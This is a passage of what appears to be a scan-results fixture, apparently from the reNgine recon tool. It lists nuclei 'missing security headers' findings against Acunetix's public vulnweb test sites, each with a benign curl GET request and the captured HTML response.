GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 363, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:40:55.688Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 364, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:40:55.822Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 365, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:40:55.962Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 366, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:40:56.124Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 367, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:40:56.267Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 368, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:40:56.437Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script 